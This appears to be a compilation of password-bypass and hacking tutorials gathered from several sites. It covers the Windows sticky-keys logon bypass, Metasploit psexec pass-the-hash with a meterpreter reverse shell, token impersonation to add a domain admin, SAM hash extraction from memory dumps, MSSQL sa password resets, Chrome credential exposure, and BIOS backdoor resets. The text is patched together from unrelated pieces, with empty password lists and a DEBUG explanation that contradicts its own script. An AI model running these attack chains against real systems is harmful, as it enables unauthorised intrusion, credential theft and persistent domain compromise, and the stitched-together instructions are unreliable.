Please note that resetting the password from an account other than the corresponding user account always means that the user loses the credentials stored in the Windows Vault, stored Internet Explorer passwords, and files that you encrypted with the Encrypting File System (EFS). Of course, if you have a backup of these credentials, you can restore them; likewise, if you have exported the private EFS key, you can import it again after you have reset the password.

Like with all other solutions that allow you to reset the Windows password without having an account on the corresponding computer, you have to boot from a second operating system and access the Windows installation while it is offline.

You can do this with a bootable Windows PE USB stick or by using Windows RE. You can start Windows RE by booting the Windows Vista or Windows 7 setup DVD and then selecting “Repair” instead of “Install Windows.”

By the way, you can’t use the Windows XP boot CD for this purpose because its Recovery Console will ask for a password for the offline installation. However, you can use a Vista or Windows 7 DVD to reset a forgotten Windows administrator password on Windows XP.

This works because Windows RE, which is based on Vista or Windows 7, will let you launch a command prompt with access to an offline installation without requiring a password.

To reset a forgotten administrator password, follow these steps:

1. Boot from Windows PE or Windows RE and access the command prompt.
2. Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
3. Type the following command (replace “c:” with the correct drive letter if Windows is not located on C:):
   copy c:\windows\system32\sethc.exe c:\
   This creates a copy of sethc.exe to restore later.
4. Type this command to replace sethc.exe with cmd.exe:
   copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
5. Reboot your computer and start the Windows installation where you forgot the administrator password.
6. After you see the logon screen, press the SHIFT key five times.
7. You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
   net user you_user_name new_password
   If you don’t know your user name, just type net user to list the available user names.
8. You can now log on with the new password.

I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online.

Via: 4sysops.com

mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM
msfconsole
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain
PWNED

Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

Tools Needed :

MDD

pyCrypto

Volatility 1.3 Beta

Volatility Plugin from Moyix

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Step by Step Example :

First of all, run MDD to dump the memory of the machine. The output file , would be an image of the physical memory, and MDD is often used to only dump the memory.

C:\Documents and Settings\Administrator\Desktop\MDD>mdd_1.3.exe -o dump.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c’ for details.

-> Dumping 511.48 MB of physical memory to file ‘dump.dd’.

130938 map operations succeeded (1.00)

0 map operations failed

took 32 seconds to write

MD5 is: 78924418adaf67d22a6687dcc6ff4e23

C:\Documents and Settings\Administrator\Desktop\MDD>

Next, we will need to analyze the “memory image” – dump.dd .

For this, we will be using Using Volatility (1.3_Beta), Volatility Plugin from Moyix, and a Windows Hash/Password Finder (SamInside) to identify the passwords.

1. First of all, most of these scripts are written in python, and as such, you would need to download and install a python interpreter (Active Python ).

2. Download Volatility (1.3_Beta) , extract it to a folder.

3. Download Volatility Plugin from Moyix, extract it, and copy its content into the Volatility folder, overwriting your existing forensics, memory_objects, and memory_plugins folders.

4. Download pyCrypto and install it.

5. Copy the dump.dd file (output file of MDD) into the Volatility folder.

6. Run hivescan from volatility to get the hive offsets. Execute the following:

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta> python volatility hivescan -f dump.dd

Offset (hex)

45147992 0×2b0e758

45393752 0×2b4a758

49832984 0×2f86418

56797016 0×362a758

58091352 0×3766758

64191328 0×3d37b60

145440776 0×8ab4008

146819936 0×8c04b60

147082080 0×8c44b60

197245792 0xbc1bb60

215368912 0xcd644d0

228964464 0xda5b870

244838408 0xe97f008

271077384 0×10285008

271171592 0×1029c008

361696096 0×158f0b60

373147760 0×163dc870

401433808 0×17ed64d0

425734152 0×19603008

435642376 0×19f76008

452021088 0×1af14b60

489651040 0×1d2f7b60

506391392 0×1e2eeb60

509397104 0×1e5cc870

526976208 0×1f6904d0

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>

7. Next, Run hivelist from volatility with the first hivescan offset, from previous output. Execute the following:

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>python volatility hivelist -f dump.dd -o 0×2b0e758

Address Name

0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Da

ta\Microsoft\Windows\UsrClass.dat

0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT

0xe1afeb60 \Documents and Settings\LocalService\Local Settings\Application Dat

a\Microsoft\Windows\UsrClass.dat

0xe1b4c008 \Documents and Settings\LocalService\NTUSER.DAT

0xe1b13870 \Documents and Settings\NetworkService\Local Settings\Application D

ata\Microsoft\Windows\UsrClass.dat

0xe1b004d0 \Documents and Settings\NetworkService\NTUSER.DAT

0xe1609b60 \WINDOWS\system32\config\software

0xe160bb60 \WINDOWS\system32\config\default

0xe1741b60 \WINDOWS\system32\config\SAM

0xe1607008 \WINDOWS\system32\config\SECURITY

0xe142e418 [no name]

0xe1036758 \WINDOWS\system32\config\system

0xe1022758 [no name]

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>

8. Now that we have the address locations, Pay attention to SAM & SYSTEM addresses. Find Password Hash using this command : python volatility hashdump -f dump.dd -y System Hive Offset -s SAM Hive Offset.

python volatility hashdump -f dump.dd -y 0xe1036758 -s 0xe1741b60

Extracted SAM :

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::

john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::

Now you can just open this as a pwdump file in SamInside and crack it !

Source: Warlock

1. Reboot the
Windows Vista and boot up with
Windows Vista installation DVD. Crack
Windows Vista logon account password in minute with the
Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.

2. While the
Windows Vista installation interface pops up, click the Repair You Computer link at the bottom-left corner.

3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing
Windows Vista, looks like Recovery Console in Windows XP:

Startup Repair options is used to automatically fix problems that are preventing
Windows Vista from starting.

System Restore to restore
Windows Vista setting to an earlier point in time.

Windows Complete PC Restore to restore
Windows Vista from a full system backup.

Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that bundled with Windows setup media.

Command Prompt is the target
option of this Vista hacking guide. Click on this
option now.

4. In the
Windows Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.

5. Click on the File menu, select Add / Remove Snap-in
option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.

6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button – that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.

7. Click OK button and return to MMC windows. Under the Root Console in left panel, double-click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.

Select the Set Password from the right-click menu to set a new password / reset old password.

Src: Techol

The default password that should work for most of the Symantec uninstallation is “symantec“. Duh.

If the default password doesn’t work do this:
1) Go to Start -> Run and type regedit

2) Navigate to: 

HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Administrator Only\Security\

3) Double click on the value name “UseVPUninstallPassword” and change the value from 1 to 0

4) Close the registry and retry the uninstall.

So you’ve got the LM password but it is only in UpperCase because LM Hashes are not case sensitive. So, these passwords cannot be reuse in this form.

Example : Password cracker output for “Administrator” account

* LM password is ADMINISTRAT0R.
* NT password is ?????????????.

I’m not so lucky because the case-sensitive password isn’t “administrat0r” or “Administrat0r”. So I cannot use this to connect on the audited Windows system.

This password contains 13 characters but launching my password cracker on the NT hash is a waste of time and there is a poor chance of success.

Note :

* Password length : 13 characters.
* Details : 1 number + 12 case-sensitives letters.
* Possibilities : 2^12 = 4096 choices. (Cannot test them all manually)

In this example, lm2ntcrack will generate the 4096 possibilities for the password ADMINISTRAT0R and, for each one, the associated NT MD4 hash. Then, search for matching with the dumped hash.

Execution time : < 2 seconds to crack more than 1200 NT Hashes
To read more about this and download the script visit http://www.xmcopartners.com/lm2ntcrack/index.html

Step 1. Go to the command prompt of the server ( Start >> Run >> Cmd ) and type in command

osql –L

This command will list all the MSSQL servers near you.

Step 2. Copy full name of required MSSQL server and type

osql -S copied_servername –E

By this command you’ll connect to MSSQL server using Server administrator account (Windows Authentication).

Step 3. To change sa password you should execute the following query:

1> sp_password NULL,’new_password’,’sa’
2> go

Here the new_password will be the password which you want to set.

Now try to login to MSSQL using new password.

Another quick way:

OSQL -S MyServer -E -Q "EXEC sp_defaultdb 'sa', 'master'"
OSQL -S MyServer -E -Q "EXEC sp_password NULL, 'NewPassword', 'sa'"

1 ] Go to any site that allows you to sign in ex. webmail.pair.com

2 ] Enter your fake username. Enter a false (incorrect) password

3 ] Allow Chrome to save password ( It will prompt below the address bar)

4 ] Close Chrome

5 ] Locate and change directory using the command prompt to the path below

%:\Documents and Settings\%user name%\Local Settings\Application Data\Google\Chrome\User Data\Default\Current Session ( Path might be different in Vista )

6 ] Note that the “Current Session” file needs to be present in your
“\Application Data\Google\Chrome\User Data\Default\” directory

7 ] Type this command in cmd : find “&secret” “Current Session”

8 ] You can see that its stored in clear text.
example:
C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\C
hrome\User Data\Default>find “&secret” “Current Session”

---------- CURRENT SESSION
login_username=FakeUser&secretkey=FakePass&x=18&y=8B

Need to secure your usb drive? Click Here!

The greatest thing is: Once you’ve reached the end of the video and the list of related videos is offered to you, you can simply navigate these videos and watch them in the popup-window without having to navigate to the VerifyAge-page again. So: Open ONE restricted video – Then watch them ALL!
https://addons.mozilla.org/en-US/firefox/addon/9128

To enter the BIOS Setup try these keystrokes:

• AMI BIOS:  Del key during the POST
• DTK BIOS:  Esc key during the POST
• Award BIOS:  Ctrl-Alt-Esc
• misc BIOS:  Ctrl-Esc
• Phoenix BIOS:  Ctrl-Alt-Esc or Ctrl-Alt-S
• IBM PS/2 BIOS:  Ctrl-Alt-Ins after Ctrl-Alt-Del

Backdoor Passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords.

Award BIOS backdoor passwords:

AMI BIOS Backdoor Passwords:

Phoenix BIOS Backdoor Passwords:

Misc. Common Passwords

Other BIOS Passwords by Manufacturer

Toshiba BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM Aptiva BIOS

Press both mouse buttons repeatedly during the boot

Motherboard “Clear CMOS” Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR – CLEAR CMOS – CLR – CLRPWD – PASSWD – PASSWORD – PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.

Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don’t attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.

Note: Removing the battery to reset the CMOS will not work for all PC’s, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

Use the Debug command

Boot to MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything.

DEBUG script that will just reset the password only

Type debug and press enter.   (ex.  A:\>debug )

After typing debug you will get “-” as a prompt ,type these exactly how they are written.

o 70 10
o 71 20
quit

Explanation of code:

DEBUG    ; Run DEBUG, “-” will appear on each line then type:
o 70 20     ; Send 70 to address 18
o 71 21     ; Send 71 to address FF
q              ; Quit DEBUG

or you can use this alternate DEBUG script that will just reset the the BIOS

A <ENTER>
MOV AX,0 <ENTER>
MOV AX,CX <ENTER>
OUT 70,AL <ENTER>
MOV AX,0 <ENTER>
OUT 71,AL <ENTER>
INC CX <ENTER>
CMP CX,100 <ENTER>
JB 103 <ENTER>
INT 20 <ENTER>
<ENTER> Note: Nothing is typed on this line
G <ENTER> By pressing G this will execute the above script
Q <ENTER>

Then reboot and you will get a Setup Checksum Error. Go into setup, correct all the incorrect values, time, date…

Alternatively you can use the program WipeCMOS from a boot floppy

Use the Decoding software

CmosPwd by CGSecurity – This is probably the most up to date and popular CMOS decryption tool. CmosPwd decrypts password stored in cmos used to access BIOS SETUP, you can also backup, restore and erase/kill cmos.You will have to be logged in as administrator, run ioperm -i command and then run cmospwd_win.exe

PC CMOS Cleaner – PC CMOS Cleaner is an easy-to-use tool to recover, delete, decode and display the superior passwords stored in BIOS whatever the brand is. It’s an bootable CD that runs on x86 and x86_64 computers. It can display the superior passwords of the BIOS, remove BIOS password(will set the BIOS to default status, need reset date).